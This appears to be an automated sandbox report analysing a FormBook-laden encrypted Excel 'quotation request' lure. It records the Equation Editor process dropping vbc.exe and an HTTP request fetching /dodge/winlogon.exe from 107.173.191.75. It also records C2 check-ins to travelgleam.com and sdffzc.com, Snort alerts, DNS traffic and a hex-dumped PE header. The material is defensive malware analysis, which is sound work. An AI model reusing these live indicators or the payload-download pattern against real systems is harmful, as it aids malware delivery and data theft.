                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF7FF8D0B81F71A466.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFF9926B065B1BF5C6.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\Desktop\~$Quotation Request - Alligator Pty Ltd.xlsx
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:true
                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        C:\Users\Public\vbc.exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):513443
                                        Entropy (8bit):7.37315837962637
                                        Encrypted:false
                                        SSDEEP:12288:7lIKV65P7x6p5laFBAteHb9Pzrv4QHA5A:7Cq47xO5MXAtYxbrQgAe
                                        MD5:8E90E8E526BC80036BA6B50A913A1880
                                        SHA1:56F076B442E362E58E787FCEA35CEA45A70447EE
                                        SHA-256:50901C9BDF963127A05847C8C0A1D71D8C02310C491A159CF87A1E888CEAB348
                                        SHA-512:60F5346007C19104284630001F665AE8B74C71DAB5B7BF8D6A60AA639281929A0F8E60DED6150A3B395DD56C0DC0A5B13824329CA1C093EC96ACAAAF50A0E5BA
                                        Malicious:true
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................@...............................................t.......p..@............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc...@....p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.970636264710058
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:Quotation Request - Alligator Pty Ltd.xlsx
                                        File size:234520
                                        MD5:90e995ae2b06b84644586091a994f43a
                                        SHA1:a6c83577fd947650a6b816fd910ebb7fd3464bca
                                        SHA256:1e8d78f614b82c1bdc730e745228b860d5b71888ac90efbf5d74af4ea3f876f9
                                        SHA512:2ae4e833aa255bc20b870a2c08ce94e3a4cf7cd9248377cd4f5fbdc525f83af8eaab2df1ebb82d1b7fc6e28f8a89dc10a1db1c3a65100f656a7952a294b21b9f
                                        SSDEEP:3072:gZfy7Qpz9a4UV0yosTOqZt+B0OH0UrmxKlwQyENBsGTDWgylTyUp7aQlelDjIWOM:ghXp5a4UFlYnHZix0wrGK3ta3VIpM
                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4e2aa8aa4b4bcb4

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        12/02/21-19:19:49.540569TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2247.246.136.142
                                        12/02/21-19:19:49.540569TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2247.246.136.142
                                        12/02/21-19:19:49.540569TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2247.246.136.142

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 2, 2021 19:18:07.276129007 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.390578985 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.390664101 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.391019106 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.507664919 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.507770061 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.507807016 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.507838964 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.507875919 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.507925034 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.507945061 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.507988930 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.621927023 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.621970892 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.621994972 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.622023106 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.622112036 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.622150898 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.622312069 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.622400045 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.622411966 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.622437000 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.622452974 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.622462988 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.622478962 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.622487068 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.736310959 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.736378908 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.736412048 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.736454010 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.736534119 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.736938953 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737015009 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737035036 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737051964 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737070084 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737087011 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737099886 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737116098 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737124920 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737169027 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737170935 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737211943 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737247944 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737265110 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737291098 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737304926 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737351894 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737370014 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737389088 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737397909 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737411976 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737425089 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.737474918 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.737520933 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.738908052 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.851687908 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.851716042 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.851738930 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.851762056 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.851773977 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.851798058 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.851800919 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.852946997 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.852974892 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.852996111 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853015900 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853037119 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853055954 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853147030 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853189945 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853204966 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853229046 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853251934 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853257895 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853279114 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853283882 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853358030 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853379965 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853394985 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853404045 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853421926 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853435993 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853446007 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853470087 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853537083 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853559017 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853573084 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853590012 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853631973 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853652954 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853678942 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853688955 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853806973 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853828907 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853847027 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853852034 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853876114 CET8049165107.173.191.75192.168.2.22
                                        Dec 2, 2021 19:18:07.853876114 CET4916580192.168.2.22107.173.191.75
                                        Dec 2, 2021 19:18:07.853904009 CET4916580192.168.2.22107.173.191.75

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 2, 2021 19:19:29.030253887 CET5216753192.168.2.228.8.8.8
                                        Dec 2, 2021 19:19:29.141184092 CET53521678.8.8.8192.168.2.22
                                        Dec 2, 2021 19:19:35.253619909 CET5059153192.168.2.228.8.8.8
                                        Dec 2, 2021 19:19:35.284832001 CET53505918.8.8.8192.168.2.22
                                        Dec 2, 2021 19:19:40.431263924 CET5780553192.168.2.228.8.8.8
                                        Dec 2, 2021 19:19:40.940474987 CET53578058.8.8.8192.168.2.22
                                        Dec 2, 2021 19:19:49.090929985 CET5903053192.168.2.228.8.8.8
                                        Dec 2, 2021 19:19:49.426925898 CET53590308.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Dec 2, 2021 19:19:29.030253887 CET192.168.2.228.8.8.80x439cStandard query (0)www.travelgleam.comA (IP address)IN (0x0001)
                                        Dec 2, 2021 19:19:35.253619909 CET192.168.2.228.8.8.80x8eb8Standard query (0)www.subsoilcorp.comA (IP address)IN (0x0001)
                                        Dec 2, 2021 19:19:40.431263924 CET192.168.2.228.8.8.80xc18cStandard query (0)www.ll1ysq.bizA (IP address)IN (0x0001)
                                        Dec 2, 2021 19:19:49.090929985 CET192.168.2.228.8.8.80xfc43Standard query (0)www.sdffzc.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Dec 2, 2021 19:19:29.141184092 CET8.8.8.8192.168.2.220x439cNo error (0)www.travelgleam.comtravelgleam.comCNAME (Canonical name)IN (0x0001)
                                        Dec 2, 2021 19:19:29.141184092 CET8.8.8.8192.168.2.220x439cNo error (0)travelgleam.com162.210.195.97A (IP address)IN (0x0001)
                                        Dec 2, 2021 19:19:35.284832001 CET8.8.8.8192.168.2.220x8eb8Name error (3)www.subsoilcorp.comnonenoneA (IP address)IN (0x0001)
                                        Dec 2, 2021 19:19:40.940474987 CET8.8.8.8192.168.2.220xc18cName error (3)www.ll1ysq.biznonenoneA (IP address)IN (0x0001)
                                        Dec 2, 2021 19:19:49.426925898 CET8.8.8.8192.168.2.220xfc43No error (0)www.sdffzc.comminisite.alibaba.comCNAME (Canonical name)IN (0x0001)
                                        Dec 2, 2021 19:19:49.426925898 CET8.8.8.8192.168.2.220xfc43No error (0)minisite.alibaba.comminisite.alibaba.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)
                                        Dec 2, 2021 19:19:49.426925898 CET8.8.8.8192.168.2.220xfc43No error (0)minisite.alibaba.com.gds.alibabadns.com47.246.136.142A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • 107.173.191.75
                                        • www.travelgleam.com
                                        • www.sdffzc.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249165107.173.191.7580C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Dec 2, 2021 19:18:07.391019106 CET0OUTGET /dodge/winlogon.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 107.173.191.75
                                        Connection: Keep-Alive


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1107.173.191.7580192.168.2.2249165C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        Dec 2, 2021 19:18:07.507664919 CET1INHTTP/1.1 200 OK
                                        Date: Thu, 02 Dec 2021 18:18:07 GMT
                                        Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.33
                                        Last-Modified: Thu, 02 Dec 2021 08:53:53 GMT
                                        ETag: "7d5a3-5d225ee196c33"
                                        Accept-Ranges: bytes
                                        Content-Length: 513443
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 40 c5 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 40 c5 02 00 00 70 03 00 00 c6 02 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELH\0p@@tp@p.texth[\ `.rdatap`@@.dataX\t@.ndata.rsrc@px@@


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.2249166162.210.195.9780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Dec 2, 2021 19:19:29.260524035 CET544OUTGET /hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== HTTP/1.1
                                        Host: www.travelgleam.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Dec 2, 2021 19:19:30.328233004 CET545INHTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Thu, 02 Dec 2021 18:19:30 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        X-Redirect-By: WordPress
                                        Set-Cookie: ads_session_352ccc2461df9c8d3c6bb4585f3c3cb2=af6ddcc617a3e1afebfd91a704249aef%7C%7C1638641970%7C%7C1638638370%7C%7Cda48612d1ed0b29c93d61e3989fe0d16; expires=Sat, 01-Jan-2022 18:19:30 GMT; Max-Age=2592000; path=/
                                        Set-Cookie: PHPSESSID=b3d6c12ed435fd207b9e867cc70e2029; path=/
                                        Location: http://travelgleam.com/hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A==
                                        X-XSS-Protection: 1; mode=block
                                        X-Content-Type-Options: nosniff
                                        X-Nginx-Upstream-Cache-Status: MISS
                                        X-Server-Powered-By: Engintron


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.224916847.246.136.14280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Dec 2, 2021 19:19:49.540569067 CET546OUTGET /hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa HTTP/1.1
                                        Host: www.sdffzc.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Dec 2, 2021 19:19:49.653724909 CET547INHTTP/1.1 429
                                        Server: Tengine
                                        Date: Thu, 02 Dec 2021 18:19:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: ali_apache_id=84.17.52.65.1638469189599.912680.7; path=/; domain=.alibaba.com; expires=Wed, 30-Nov-2084 01:01:01 GMT
                                        ETag: "6188f55d-216"
                                        Data Raw: 32 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 41 52 43 48 49 56 45 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 69 66 20 28 2f 5e 5c 2f 70 72 6f 64 75 63 74 5c 2f 5c 64 2b 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 29 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 2f 27 3b 0a 7d 20 65 6c 73 65 20 69 66 20 28 2f 5e 2e 2a 5c 2e 6d 2e 5b 61 2d 7a 5d 2b 5c 2e 61 6c 69 62 61 62 61 5c 2e 63 6f 6d 24 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 29 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 2f 2f 6d 2e 61 6c 69 62 61 62 61 2e 63 6f 6d 2f 65 72 72 6f 72 34 30 34 2e 68 74 6d 27 3b 0a 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 2f 2f 65 72 72 6f 72 2e 61 6c 69 62 61 62 61 2e 63 6f 6d 2f 65 72 72 6f 72 34 30 34 2e 68 74 6d 27 3b 0a 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 216<!doctype html><html lang="en"><head><meta charset="UTF-8"><title>HTTP 404</title><meta name="ROBOTS" content="NOARCHIVE"><meta name="ROBOTS" content="NOINDEX, NOFOLLOW" /><script type="text/javascript">if (/^\/product\/\d+/.test(window.location.pathname)) { window.location.href = '/';} else if (/^.*\.m.[a-z]+\.alibaba\.com$/.test(window.location.hostname)) { window.location.href = '//m.alibaba.com/error404.htm';} else { window.location.href = '//error.alibaba.com/error404.htm';}</script></head></html>0


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: EXCEL.EXE PID: 2212 Parent PID: 596

                                        General

                                        Start time:19:17:22
                                        Start date:02/12/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13f7d0000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: EQNEDT32.EXE PID: 1160 Parent PID: 596

